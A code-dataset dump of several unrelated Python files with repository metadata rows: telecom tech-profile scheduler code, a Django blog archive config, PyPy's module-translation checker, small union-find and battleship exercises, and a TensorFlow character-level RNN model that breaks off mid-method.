                us_scheduler.q_sched_policy))
        return us_scheduler

    @staticmethod
    def get_ds_scheduler(tech_profile_instance):
        """Build the openolt Scheduler protobuf for the downstream direction."""
        ds_scheduler = openolt_pb2.Scheduler(
            direction=TechProfile.get_parameter(
                'direction', tech_profile_instance.ds_scheduler.
                direction),
            additional_bw=TechProfile.get_parameter(
                'additional_bw', tech_profile_instance.
                ds_scheduler.additional_bw),
            priority=tech_profile_instance.ds_scheduler.priority,
            weight=tech_profile_instance.ds_scheduler.weight,
            sched_policy=TechProfile.get_parameter(
                'sched_policy', tech_profile_instance.ds_scheduler.
                q_sched_policy))
        return ds_scheduler

    @staticmethod
    def get_tconts(tech_profile_instance, us_scheduler=None, ds_scheduler=None):
        """Build the pair of openolt Tcont messages (US then DS) for an
        instance, creating the schedulers when not supplied."""
        if us_scheduler is None:
            us_scheduler = TechProfile.get_us_scheduler(tech_profile_instance)
        if ds_scheduler is None:
            ds_scheduler = TechProfile.get_ds_scheduler(tech_profile_instance)
        tconts = [openolt_pb2.Tcont(direction=TechProfile.get_parameter(
            'direction',
            tech_profile_instance.
            us_scheduler.direction),
            alloc_id=tech_profile_instance.
            us_scheduler.alloc_id,
            scheduler=us_scheduler),
            openolt_pb2.Tcont(direction=TechProfile.get_parameter(
                'direction',
                tech_profile_instance.
                ds_scheduler.direction),
                alloc_id=tech_profile_instance.
                ds_scheduler.alloc_id,
                scheduler=ds_scheduler)]
        return tconts

    @staticmethod
    def get_parameter(param_type, param_value):
        """Map a profile string onto the matching openolt_pb2 enum key name.

        :return: the matching enum key, or None when ``param_value`` names
            no member of the selected enum (or on any error).
        """
        parameter = None
        try:
            if param_type == 'direction':
                for direction in openolt_pb2.Direction.keys():
                    if param_value == direction:
                        parameter = direction
            elif param_type == 'discard_policy':
                for discard_policy in openolt_pb2.DiscardPolicy.keys():
                    if param_value == discard_policy:
                        parameter = discard_policy
            elif param_type == 'sched_policy':
                for sched_policy in openolt_pb2.SchedulingPolicy.keys():
                    if param_value == sched_policy:
                        parameter = sched_policy
            elif param_type == 'additional_bw':
                for bw_component in openolt_pb2.AdditionalBW.keys():
                    if param_value == bw_component:
                        parameter = bw_component
        except BaseException as e:
            log.exception(exception=e)
        return parameter
class TechProfileInstance(object):
    """A per-subscriber instantiation of a technology profile.

    Binds concrete alloc and gemport ids (obtained from the resource
    manager) to the schedulers and GEM port attributes of a profile.
    """

    def __init__(self, subscriber_identifier, tech_profile, resource_mgr,
                 intf_id, num_of_tconts=1):
        # When tech_profile is None the instance is left empty (no
        # attributes are set).
        if tech_profile is not None:
            self.subscriber_identifier = subscriber_identifier
            self.num_of_tconts = num_of_tconts
            self.num_of_gem_ports = tech_profile.num_gem_ports
            self.name = tech_profile.name
            self.profile_type = tech_profile.profile_type
            self.version = tech_profile.version
            self.instance_control = tech_profile.instance_control
            # TODO: Fixed num_of_tconts to 1 per TP Instance.
            # This may change in future
            assert (num_of_tconts == 1)
            # Get alloc id and gemport id using resource manager
            alloc_id = resource_mgr.get_resource_id(intf_id,
                                                    'ALLOC_ID',
                                                    num_of_tconts)
            gem_ports = resource_mgr.get_resource_id(intf_id,
                                                     'GEMPORT_ID',
                                                     self.num_of_gem_ports)
            gemport_list = list()
            # get_resource_id may hand back a single id or a list of ids;
            # normalise to a list either way.
            if isinstance(gem_ports, int):
                gemport_list.append(gem_ports)
            elif isinstance(gem_ports, list):
                for gem in gem_ports:
                    gemport_list.append(gem)
            else:
                raise Exception("invalid-type")
            # The same alloc id is attached to both directions' schedulers.
            self.us_scheduler = TechProfileInstance.IScheduler(
                alloc_id, tech_profile.us_scheduler)
            self.ds_scheduler = TechProfileInstance.IScheduler(
                alloc_id, tech_profile.ds_scheduler)
            self.upstream_gem_port_attribute_list = list()
            self.downstream_gem_port_attribute_list = list()
            # Pair each allocated gemport id with the profile's i-th
            # upstream/downstream attribute entry.
            for i in range(self.num_of_gem_ports):
                self.upstream_gem_port_attribute_list.append(
                    TechProfileInstance.IGemPortAttribute(
                        gemport_list[i],
                        tech_profile.upstream_gem_port_attribute_list[
                            i]))
                self.downstream_gem_port_attribute_list.append(
                    TechProfileInstance.IGemPortAttribute(
                        gemport_list[i],
                        tech_profile.downstream_gem_port_attribute_list[
                            i]))

    class IScheduler(Scheduler):
        """Scheduler plus the concrete alloc (T-CONT) id of this instance."""

        def __init__(self, alloc_id, scheduler):
            super(TechProfileInstance.IScheduler, self).__init__(
                scheduler.direction, scheduler.additional_bw,
                scheduler.priority,
                scheduler.weight, scheduler.q_sched_policy)
            self.alloc_id = alloc_id

    class IGemPortAttribute(GemPortAttribute):
        """GemPortAttribute plus the concrete gemport id of this instance."""

        def __init__(self, gemport_id, gem_port_attribute):
            super(TechProfileInstance.IGemPortAttribute, self).__init__(
                gem_port_attribute.pbit_map, gem_port_attribute.discard_config,
                gem_port_attribute.aes_encryption,
                gem_port_attribute.scheduling_policy,
                gem_port_attribute.priority_q, gem_port_attribute.weight,
                gem_port_attribute.max_q_size,
                gem_port_attribute.discard_policy)
            self.gemport_id = gemport_id

    def to_json(self):
        # Serialise recursively via __dict__ so nested value objects become
        # plain JSON objects.
        # NOTE(review): relies on a module-level `json` import that is not
        # visible in this excerpt -- confirm it exists in the file.
        return json.dumps(self, default=lambda o: o.__dict__,
                          indent=4)
| 44.543294 | 100 | 0.605809 |
6841e42176cff92d1b3d388da4318e1a0a7c62dc | 3,181 | py | Python | djangoplicity/blog/options.py | djangoplicity/blog | 2465b34228d794db9f746e314fa04657cbf18d38 | [
"BSD-3-Clause"
] | null | null | null | djangoplicity/blog/options.py | djangoplicity/blog | 2465b34228d794db9f746e314fa04657cbf18d38 | [
"BSD-3-Clause"
] | 1 | 2021-10-20T00:11:16.000Z | 2021-10-20T00:17:51.000Z | djangoplicity/blog/options.py | djangoplicity/djangoplicity-blog | 2465b34228d794db9f746e314fa04657cbf18d38 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# eso-blog
# Copyright (c) 2007-2017, European Southern Observatory (ESO)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of the European Southern Observatory nor the names
# of its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY ESO ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL ESO BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE
from django.utils.translation import ugettext_noop as _
from djangoplicity.archives.contrib.browsers import ListBrowser
from djangoplicity.archives.contrib.queries.defaults import AllPublicQuery, \
EmbargoQuery
from djangoplicity.archives.options import ArchiveOptions
from djangoplicity.blog.queries import PostTagQuery
from djangoplicity.blog.models import Tag
from djangoplicity.blog.views import PostDetailView
class PostOptions(ArchiveOptions):
    """Archive configuration for blog posts (djangoplicity archive framework)."""

    # Model field used in detail URLs instead of the primary key.
    slug_field = 'slug'
    urlname_prefix = 'blog'
    template_name = 'archives/post/detail.html'
    detail_view = PostDetailView
    # Query optimisations applied when fetching posts.
    select_related = ('banner', )
    prefetch_related = ('tags', 'authordescription_set__author')

    class Queries(object):
        # Named query sets exposed by this archive.
        default = AllPublicQuery(browsers=('normal', ), verbose_name=_('Blog Posts'), feed_name='default', select_related=['category'])
        staging = EmbargoQuery(browsers=('normal', ), verbose_name=_('Blog Posts (Staging)'))
        # Filtered listings: by tag and by category (both resolved by slug).
        tag = PostTagQuery(browsers=('normal', ), relation_field='tags', url_field='slug', title_field='name', use_category_title=True, verbose_name='%s')
        category = PostTagQuery(browsers=('normal', ), relation_field='category', url_field='slug', title_field='name', use_category_title=True, verbose_name='%s')

    class Browsers(object):
        normal = ListBrowser()

    @staticmethod
    def extra_context( obj, lang=None ):
        # Every tag, alphabetically, for use by the detail template.
        return {
            'tags': Tag.objects.order_by('name')
        }

    @staticmethod
    def feeds():
        # NOTE(review): imported inside the function, presumably to avoid a
        # circular import at module load time -- confirm.
        from djangoplicity.blog.feeds import PostFeed
        return {
            '': PostFeed,
        }
| 43.575342 | 163 | 0.735932 |
5fb0a319f4e5206d0c120bcad50a91a63cfb22c6 | 2,716 | py | Python | pypy/objspace/fake/checkmodule.py | pymtl/pypy-pymtl3 | d2f66f87686e48aeb1eecabeaa3de1381a149f2c | [
"Apache-2.0",
"OpenSSL"
] | 1 | 2021-06-02T23:02:09.000Z | 2021-06-02T23:02:09.000Z | pypy/objspace/fake/checkmodule.py | pymtl/pypy-pymtl3 | d2f66f87686e48aeb1eecabeaa3de1381a149f2c | [
"Apache-2.0",
"OpenSSL"
] | 1 | 2021-03-30T18:08:41.000Z | 2021-03-30T18:08:41.000Z | pypy/objspace/fake/checkmodule.py | pymtl/pypy-pymtl3 | d2f66f87686e48aeb1eecabeaa3de1381a149f2c | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | import sys
import traceback
from rpython.translator.tool.pdbplus import PdbPlusShow
from pypy.objspace.fake.objspace import FakeObjSpace, W_Root
from pypy.config.pypyoption import get_pypy_config
def checkmodule(modname, translate_startup=True, ignore=(),
                c_compile=False, extra_func=None, rpython_opts=None,
                pypy_opts=None, show_pdbplus=False):
    """
    Check that the module 'modname' translates.

    NOTE: this is RPython tooling targeting Python 2 (bare ``print``,
    ``dict.itervalues()``).

    Options:
      translate_startup: when False, the modules' startup() code is executed
          immediately under the fake space instead of being included in the
          translated function
      ignore: list of module interpleveldefs/appleveldefs to ignore
      c_compile: determine whether to invoke the C compiler after rtyping
      extra_func: extra function which will be annotated and called. It takes
          a single "space" argument
      rpython_opts: dictionary containing extra configuration options
      pypy_opts: dictionary containing extra configuration options
      show_pdbplus: show Pdb+ prompt on error. Useful for pdb commands such as
          flowg, callg, etc.
    """
    config = get_pypy_config(translating=True)
    if pypy_opts:
        config.set(**pypy_opts)
    space = FakeObjSpace(config)
    seeobj_w = []
    modules = []
    modnames = [modname]
    # NOTE(review): the loop variable deliberately(?) shadows the `modname`
    # parameter; only one module name is ever in the list.
    for modname in modnames:
        mod = __import__(
            'pypy.module.%s.moduledef' % modname, None, None, ['__doc__'])
        # force computation and record what we wrap
        module = mod.Module(space, W_Root())
        module.setup_after_space_initialization()
        module.init(space)
        modules.append(module)
        for name in module.loaders:
            if name in ignore:
                continue
            seeobj_w.append(module._load_lazily(space, name))
        # Also force any lazily-loaded names of submodules.
        if hasattr(module, 'submodules'):
            for cls in module.submodules.itervalues():
                submod = cls(space, W_Root())
                for name in submod.loaders:
                    seeobj_w.append(submod._load_lazily(space, name))
    #
    def func():
        for mod in modules:
            mod.startup(space)
    if not translate_startup:
        func()  # call it now
        func = None
    opts = {'translation.list_comprehension_operations': True}
    if rpython_opts:
        opts.update(rpython_opts)
    try:
        space.translates(func, seeobj_w=seeobj_w,
                         c_compile=c_compile, extra_func=extra_func, **opts)
    # NOTE(review): bare except is deliberate here -- any failure should be
    # surfaced, optionally under the Pdb+ shell.
    except:
        if not show_pdbplus:
            raise
        print
        exc, val, tb = sys.exc_info()
        traceback.print_exc()
        # Open the Pdb+ shell positioned on the failing traceback.
        sys.pdbplus = p = PdbPlusShow(space.t)
        p.start(tb)
    else:
        if show_pdbplus:
            # Success path: still drop into Pdb+ for interactive inspection.
            sys.pdbplus = p = PdbPlusShow(space.t)
            p.start(None)
| 33.530864 | 79 | 0.624448 |
a94b98d1fe8084cab0f55c93d7522de9d218562c | 1,170 | py | Python | other/UF.py | misslibra/algorithms | 31648ee7a25710ff5340595222525721116f7e84 | [
"Apache-2.0"
] | 1 | 2021-12-19T14:17:46.000Z | 2021-12-19T14:17:46.000Z | other/UF.py | misslibra/algorithms | 31648ee7a25710ff5340595222525721116f7e84 | [
"Apache-2.0"
] | null | null | null | other/UF.py | misslibra/algorithms | 31648ee7a25710ff5340595222525721116f7e84 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
# author: pyclearl
class Solution:
    """Word-similarity judge for sentences, modelled as a connectivity
    (union-find, quick-find variant) problem.

    ``maps`` is a dict of similar word pairs.  Similarity is transitive,
    so ``{"a": "b", "b": "c"}`` makes "a" and "c" similar.  Words never
    mentioned in ``maps`` are only similar to themselves.

    Fix vs. the original: ``_map`` and ``count`` were never initialised
    (only commented out), so every method raised AttributeError; the
    ``maps`` argument was stored but never used.
    """

    def __init__(self, maps=None):
        # maps is now optional (default: no similar pairs) for backward
        # compatibility with callers constructing Solution() bare.
        self.maps = maps or {}
        self._map = {}   # word -> representative of its similarity group
        self.count = 0   # number of distinct groups currently tracked
        for p, q in self.maps.items():
            self.union(p, q)

    def _add(self, word):
        # Register an unseen word as its own singleton group.
        if word not in self._map:
            self._map[word] = word
            self.count += 1

    def union(self, p, q):
        """Merge the groups containing p and q (no-op if already merged)."""
        self._add(p)
        self._add(q)
        p_rep = self.find(p)
        q_rep = self.find(q)
        if p_rep == q_rep:
            return
        # Quick-find: relabel every member of p's group with q's rep.
        for word in self._map:
            if self._map[word] == p_rep:
                self._map[word] = q_rep
        self.count -= 1

    def find(self, p):
        """Return p's group representative; unknown words represent themselves."""
        return self._map.get(p, p)

    def connected(self, p, q):
        """True iff p and q belong to the same similarity group."""
        return self.find(p) == self.find(q)

    def judge(self, s1, s2):
        """Return True iff the two sentences are pairwise word-similar."""
        words1 = s1.split()
        words2 = s2.split()
        if len(words1) != len(words2):
            # Robustness fix: different word counts can never match pairwise
            # (the original zip() silently truncated the longer sentence).
            return False
        return all(self.connected(p, q) for p, q in zip(words1, words2))
if __name__ == '__main__':
    # Similar word pairs; similarity is transitive, so movie ~ film ~ show.
    maps = {
        "movie": "film",
        "book": "note",
        "film": "show",
        "review": "rating"
    }
    # Fix: the original called Solution() without the required mapping table,
    # and its first assertion compared words ("visible"/"show") that the
    # table never relates.
    s = Solution(maps)
    assert s.judge("movie review", "show rating")
    assert not s.judge("book review", "movie rating")
| 21.272727 | 53 | 0.482051 |
b8eb548e2131ebb9f799a60f9816796bacb618a3 | 1,552 | py | Python | battleshipGame.py | adeelnasimsyed/Interview-Prep | 23ac6d2139df97cf3939c96b17c88e1345846c18 | [
"MIT"
] | null | null | null | battleshipGame.py | adeelnasimsyed/Interview-Prep | 23ac6d2139df97cf3939c96b17c88e1345846c18 | [
"MIT"
] | null | null | null | battleshipGame.py | adeelnasimsyed/Interview-Prep | 23ac6d2139df97cf3939c96b17c88e1345846c18 | [
"MIT"
] | null | null | null | from collections import defaultdict
def battleshipGame(board, moves):
    """Play a sequence of shots against a battleship board.

    ``board`` is a 2-D grid in which "#" marks a ship cell; ships are
    straight horizontal or vertical runs of "#" cells.  For every
    ``[row, col]`` entry in ``moves`` one result string is produced:

      * "Miss"      -- no live ship cell at that position
      * "Hit"       -- a ship cell was hit but the ship has cells left
      * "Dead"      -- the shot sank a ship while other ships remain
      * "Game Over" -- the shot sank the last ship; the result list is
                       returned immediately, ignoring remaining moves

    Fixes vs. the original:
      * dead ships are now removed by their real dictionary key (the old
        code popped by enumerate() index, which drifts once any ship has
        been removed, so sunk ships lingered and "Game Over" could be
        missed), and
      * the caller's board is no longer mutated (a scratch copy is used).
    """
    grid = [row[:] for row in board]  # scratch copy; keep caller's board intact
    rows = len(grid)
    cols = len(grid[0]) if rows else 0

    # --- discover the ships ----------------------------------------------
    # Scanning top-to-bottom, left-to-right, the first '#' of each ship is
    # its head; extend downwards, then rightwards, to collect the rest.
    ships = {}  # ship id -> list of live [row, col] cells
    ship_id = 0
    for r in range(rows):
        for c in range(cols):
            if grid[r][c] != "#":
                continue
            cells = [[r, c]]
            grid[r][c] = "."
            for dr, dc in ((1, 0), (0, 1)):
                nr, nc = r + dr, c + dc
                extended = False
                while nr < rows and nc < cols and grid[nr][nc] == "#":
                    cells.append([nr, nc])
                    grid[nr][nc] = "."
                    extended = True
                    nr += dr
                    nc += dc
                if extended:
                    break  # ships are straight: only one direction applies
            ships[ship_id] = cells
            ship_id += 1

    # --- play the moves ---------------------------------------------------
    output = []
    for move in moves:
        hit_id = None
        for sid, cells in ships.items():
            if move in cells:
                hit_id = sid
                break
        if hit_id is None:
            output.append("Miss")
            continue
        cells = ships[hit_id]
        if len(cells) > 1:
            cells.remove(move)
            output.append("Hit")
        elif len(ships) == 1:
            # Last cell of the last ship: game ends immediately.
            output.append("Game Over")
            return output
        else:
            del ships[hit_id]
            output.append("Dead")
    return output
# Demo: 4x4 board with two vertical two-cell ships and one single-cell ship.
board = [[".", ".","#","#"],
         [".", ".","#","#"],
         ["#", ".",".","."],
         [".", ".",".","."]]
# Shots sink both two-cell ships, then hit the remaining single-cell ship;
# the final move is only reached if the game has not ended before it.
moves = [[0,2],[1,2], [0,3], [1,3],[2,0],[3,0]]
print(battleshipGame(board, moves))
| 18.258824 | 62 | 0.399485 |
256aedd339168e4122f80fc5dd91c890cafed495 | 14,892 | py | Python | model.py | smartsnake/chatbot-rnn | c8422e7dc7e507211158213df5e52588db624a5d | [
"MIT"
] | null | null | null | model.py | smartsnake/chatbot-rnn | c8422e7dc7e507211158213df5e52588db624a5d | [
"MIT"
] | null | null | null | model.py | smartsnake/chatbot-rnn | c8422e7dc7e507211158213df5e52588db624a5d | [
"MIT"
] | null | null | null | import tensorflow as tf
from tensorflow.python.ops import rnn_cell
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.framework import ops
from tensorflow.compat.v1.nn import rnn_cell as rnn
#from tensorflow.contrib import rnn
from tensorflow.python.util.nest import flatten
tf.compat.v1.disable_eager_execution()
import numpy as np
class PartitionedMultiRNNCell(rnn_cell.RNNCell):
    """RNN cell composed sequentially of multiple simple cells."""

    # Diagram of a PartitionedMultiRNNCell net with three layers and three partitions per layer.
    # Each brick shape is a partition, which comprises one RNNCell of size partition_size.
    # The two tilde (~) characters indicate wrapping (i.e. the two halves are a single partition).
    # Like laying bricks, each layer is offset by half a partition width so that influence spreads
    # horizontally through subsequent layers, while avoiding the quadratic resource scaling of fully
    # connected layers with respect to layer width.
    #
    #          output
    #    //////// \\\\\\\\
    #   -------------------
    #   |     |     |     |
    #   -------------------
    #  ~   |     |     |    ~
    #   -------------------
    #   |     |     |     |
    #   -------------------
    #    \\\\\\\\ ////////
    #           input

    def __init__(self, cell_fn, partition_size=128, partitions=1, layers=2):
        """Create a RNN cell composed sequentially of a number of RNNCells.
        Args:
            cell_fn: reference to RNNCell function to create each partition in each layer.
            partition_size: how many horizontal cells to include in each partition.
            partitions: how many horizontal partitions to include in each layer.
            layers: how many layers to include in the net.
        """
        super(PartitionedMultiRNNCell, self).__init__()
        self._cells = []
        for i in range(layers):
            # Each layer is an independent list of `partitions` cells.
            self._cells.append([cell_fn(partition_size) for _ in range(partitions)])
        self._partitions = partitions

    @property
    def state_size(self):
        # Return a 2D tuple where each row is the partition's cell size repeated `partitions` times,
        # and there are `layers` rows of that.
        return tuple(((layer[0].state_size,) * len(layer)) for layer in self._cells)

    @property
    def output_size(self):
        # Return the output size of each partition in the last layer times the number of partitions per layer.
        return self._cells[-1][0].output_size * len(self._cells[-1])

    def zero_state(self, batch_size, dtype):
        # Return a 2D tuple of zero states matching the structure of state_size.
        with ops.name_scope(type(self).__name__ + "ZeroState", values=[batch_size]):
            return tuple(tuple(cell.zero_state(batch_size, dtype) for cell in layer) for layer in self._cells)

    def call(self, inputs, state):
        # One forward step: run `inputs` through every layer, threading the
        # per-partition recurrent state along and returning (output, state).
        layer_input = inputs
        new_states = []
        for l, layer in enumerate(self._cells):
            # In between layers, offset the layer input by half of a partition width so that
            # activations can horizontally spread through subsequent layers.
            if l > 0:
                offset_width = layer[0].output_size // 2
                layer_input = tf.concat((layer_input[:, -offset_width:], layer_input[:, :-offset_width]),
                                        axis=1, name='concat_offset_%d' % l)
            # Create a tuple of inputs by splitting the lower layer output into partitions.
            p_inputs = tf.split(layer_input, len(layer), axis=1, name='split_%d' % l)
            p_outputs = []
            p_states = []
            for p, p_inp in enumerate(p_inputs):
                # Distinct variable scope per (layer, partition) so each
                # partition cell owns its own variables.
                with vs.variable_scope("cell_%d_%d" % (l, p)):
                    p_state = state[l][p]
                    cell = layer[p]
                    p_out, new_p_state = cell(p_inp, p_state)
                    p_outputs.append(p_out)
                    p_states.append(new_p_state)
            new_states.append(tuple(p_states))
            layer_input = tf.concat(p_outputs, axis=1, name='concat_%d' % l)
        new_states = tuple(new_states)
        return layer_input, new_states
def _rnn_state_placeholders(state):
    """Convert RNN state tensors to placeholders, reflecting the same nested tuple structure."""
    # Adapted from @carlthome's comment:
    # https://github.com/tensorflow/tensorflow/issues/2838#issuecomment-302019188
    if isinstance(state, tf.compat.v1.nn.rnn_cell.LSTMStateTuple):
        # LSTM state: replace both the cell (c) and hidden (h) tensors,
        # keeping each original tensor's dtype, shape and op name.
        c, h = state
        c = tf.compat.v1.placeholder(c.dtype, c.shape, c.op.name)
        h = tf.compat.v1.placeholder(h.dtype, h.shape, h.op.name)
        return tf.compat.v1.nn.rnn_cell.LSTMStateTuple(c, h)
    elif isinstance(state, tf.Tensor):
        # Single-tensor state (e.g. GRU / basic RNN cells).
        h = state
        h = tf.compat.v1.placeholder(h.dtype, h.shape, h.op.name)
        return h
    else:
        # Nested tuple/list of states: recurse and rebuild as a tuple.
        structure = [_rnn_state_placeholders(x) for x in state]
        return tuple(structure)
class Model():
    """Character-level RNN language model built on PartitionedMultiRNNCell.

    Builds the TF1 graph for training (infer=False) or for one-character-at-a-time
    sampling (infer=True, which forces batch_size = seq_length = 1).
    """
    def __init__(self, args, infer=False): # infer is set to true during sampling.
        self.args = args
        if infer:
            # Worry about one character at a time during sampling; no batching or BPTT.
            args.batch_size = 1
            args.seq_length = 1
        # Set cell_fn to the type of network cell we're creating -- RNN, GRU, LSTM or NAS.
        if args.model == 'rnn':
            cell_fn = rnn_cell.BasicRNNCell
        elif args.model == 'gru':
            cell_fn = rnn_cell.GRUCell
        elif args.model == 'lstm':
            cell_fn = rnn_cell.BasicLSTMCell
        elif args.model == 'nas':
            cell_fn = rnn.NASCell
        else:
            raise Exception("model type not supported: {}".format(args.model))
        # Create variables to track training progress.
        self.lr = tf.Variable(args.learning_rate, name="learning_rate", trainable=False)
        self.global_epoch_fraction = tf.Variable(0.0, name="global_epoch_fraction", trainable=False)
        self.global_seconds_elapsed = tf.Variable(0.0, name="global_seconds_elapsed", trainable=False)
        # Call tensorflow library tensorflow-master/tensorflow/python/ops/rnn_cell
        # to create a layer of block_size cells of the specified basic type (RNN/GRU/LSTM).
        # Use the same rnn_cell library to create a stack of these cells
        # of num_layers layers. Pass in a python list of these cells.
        # cell = rnn_cell.MultiRNNCell([cell_fn(args.block_size) for _ in range(args.num_layers)])
        # cell = MyMultiRNNCell([cell_fn(args.block_size) for _ in range(args.num_layers)])
        cell = PartitionedMultiRNNCell(cell_fn, partitions=args.num_blocks,
            partition_size=args.block_size, layers=args.num_layers)
        # Create a TF placeholder node of 32-bit ints (NOT floats!),
        # of shape batch_size x seq_length. This shape matches the batches
        # (listed in x_batches and y_batches) constructed in create_batches in utils.py.
        # input_data will receive input batches.
        self.input_data = tf.compat.v1.placeholder(tf.int32, [args.batch_size, args.seq_length])
        self.zero_state = cell.zero_state(args.batch_size, tf.float32)
        # Placeholders mirroring the zero-state structure, fed each step/batch.
        self.initial_state = _rnn_state_placeholders(self.zero_state)
        self._flattened_initial_state = flatten(self.initial_state)
        layer_size = args.block_size * args.num_blocks
        # Scope our new variables to the scope identifier string "rnnlm".
        with tf.compat.v1.variable_scope('rnnlm'):
            # Create new variable softmax_w and softmax_b for output.
            # softmax_w is a weights matrix from the top layer of the model (of size layer_size)
            # to the vocabulary output (of size vocab_size).
            softmax_w = tf.compat.v1.get_variable("softmax_w", [layer_size, args.vocab_size])
            # softmax_b is a bias vector of the ouput characters (of size vocab_size).
            softmax_b = tf.compat.v1.get_variable("softmax_b", [args.vocab_size])
            # Create new variable named 'embedding' to connect the character input to the base layer
            # of the RNN. Its role is the conceptual inverse of softmax_w.
            # It contains the trainable weights from the one-hot input vector to the lowest layer of RNN.
            embedding = tf.compat.v1.get_variable("embedding", [args.vocab_size, layer_size])
            # Create an embedding tensor with tf.nn.embedding_lookup(embedding, self.input_data).
            # This tensor has dimensions batch_size x seq_length x layer_size.
            inputs = tf.nn.embedding_lookup(embedding, self.input_data)
        # TODO: Check arguments parallel_iterations (default uses more memory and less time) and
        # swap_memory (default uses more memory but "minimal (or no) performance penalty")
        outputs, self.final_state = tf.compat.v1.nn.dynamic_rnn(cell, inputs,
            initial_state=self.initial_state, scope='rnnlm')
        # outputs has shape [batch_size, max_time, cell.output_size] because time_major == false.
        # Do we need to transpose the first two dimensions? (Answer: no, this ruins everything.)
        # outputs = tf.transpose(outputs, perm=[1, 0, 2])
        output = tf.reshape(outputs, [-1, layer_size])
        # Obtain logits node by applying output weights and biases to the output tensor.
        # Logits is a tensor of shape [(batch_size * seq_length) x vocab_size].
        # Recall that outputs is a 2D tensor of shape [(batch_size * seq_length) x layer_size],
        # and softmax_w is a 2D tensor of shape [layer_size x vocab_size].
        # The matrix product is therefore a new 2D tensor of [(batch_size * seq_length) x vocab_size].
        # In other words, that multiplication converts a loooong list of layer_size vectors
        # to a loooong list of vocab_size vectors.
        # Then add softmax_b (a single vocab-sized vector) to every row of that list.
        # That gives you the logits!
        self.logits = tf.matmul(output, softmax_w) + softmax_b
        if infer:
            # Convert logits to probabilities. Probs isn't used during training! That node is never calculated.
            # Like logits, probs is a tensor of shape [(batch_size * seq_length) x vocab_size].
            # During sampling, this means it is of shape [1 x vocab_size].
            self.probs = tf.nn.softmax(self.logits)
        else:
            # Create a targets placeholder of shape batch_size x seq_length.
            # Targets will be what output is compared against to calculate loss.
            self.targets = tf.compat.v1.placeholder(tf.int32, [args.batch_size, args.seq_length])
            # seq2seq.sequence_loss_by_example returns 1D float Tensor containing the log-perplexity
            # for each sequence. (Size is batch_size * seq_length.)
            # Targets are reshaped from a [batch_size x seq_length] tensor to a 1D tensor, of the following layout:
            #   target character (batch 0, seq 0)
            #   target character (batch 0, seq 1)
            #   ...
            #   target character (batch 0, seq seq_len-1)
            #   target character (batch 1, seq 0)
            #   ...
            # These targets are compared to the logits to generate loss.
            # Logits: instead of a list of character indices, it's a list of character index probability vectors.
            # seq2seq.sequence_loss_by_example will do the work of generating losses by comparing the one-hot vectors
            # implicitly represented by the target characters against the probability distrutions in logits.
            # It returns a 1D float tensor (a vector) where item i is the log-perplexity of
            # the comparison of the ith logit distribution to the ith one-hot target vector.
            loss = nn_ops.sparse_softmax_cross_entropy_with_logits(
                labels=tf.reshape(self.targets, [-1]), logits=self.logits)
            # Cost is the arithmetic mean of the values of the loss tensor.
            # It is a single-element floating point tensor. This is what the optimizer seeks to minimize.
            self.cost = tf.reduce_mean(loss)
            # Create a tensorboard summary of our cost.
            tf.summary.scalar("cost", self.cost)
            tvars = tf.trainable_variables() # tvars is a python list of all trainable TF Variable objects.
            # tf.gradients returns a list of tensors of length len(tvars) where each tensor is sum(dy/dx).
            grads, _ = tf.clip_by_global_norm(tf.gradients(self.cost, tvars),
                args.grad_clip)
            optimizer = tf.train.AdamOptimizer(self.lr) # Use ADAM optimizer.
            # Zip creates a list of tuples, where each tuple is (variable tensor, gradient tensor).
            # Training op nudges the variables along the gradient, with the given learning rate, using the ADAM optimizer.
            # This is the op that a training session should be instructed to perform.
            self.train_op = optimizer.apply_gradients(zip(grads, tvars))
            #self.train_op = optimizer.minimize(self.cost)
            self.summary_op = tf.summary.merge_all()

    def add_state_to_feed_dict(self, feed_dict, state):
        """Flatten `state` and map each tensor onto its matching initial-state placeholder."""
        for i, tensor in enumerate(flatten(state)):
            feed_dict[self._flattened_initial_state[i]] = tensor

    def save_variables_list(self):
        """Return the variables worth checkpointing (model weights + progress counters)."""
        # Return a list of the trainable variables created within the rnnlm model.
        # This consists of the two projection softmax variables (softmax_w and softmax_b),
        # embedding, and all of the weights and biases in the MultiRNNCell model.
        # Save only the trainable variables and the placeholders needed to resume training;
        # discard the rest, including optimizer state.
        save_vars = set(tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.GLOBAL_VARIABLES, scope='rnnlm'))
        save_vars.update({self.lr, self.global_epoch_fraction, self.global_seconds_elapsed})
        return list(save_vars)

    def forward_model(self, sess, state, input_sample):
        '''Run a forward pass. Return the updated hidden state and the output probabilities.'''
        # NOTE(review): input_data is an int32 placeholder but the sample is shaped
        # here as float32 -- presumably the feed conversion handles it; confirm
        # against the sampling caller.
        shaped_input = np.array([[input_sample]], np.float32)
        inputs = {self.input_data: shaped_input}
        self.add_state_to_feed_dict(inputs, state)
        [probs, state] = sess.run([self.probs, self.final_state], feed_dict=inputs)
        return probs[0], state

    def trainable_parameter_count(self):
        """Return the total number of scalar parameters across trainable 'rnnlm' variables."""
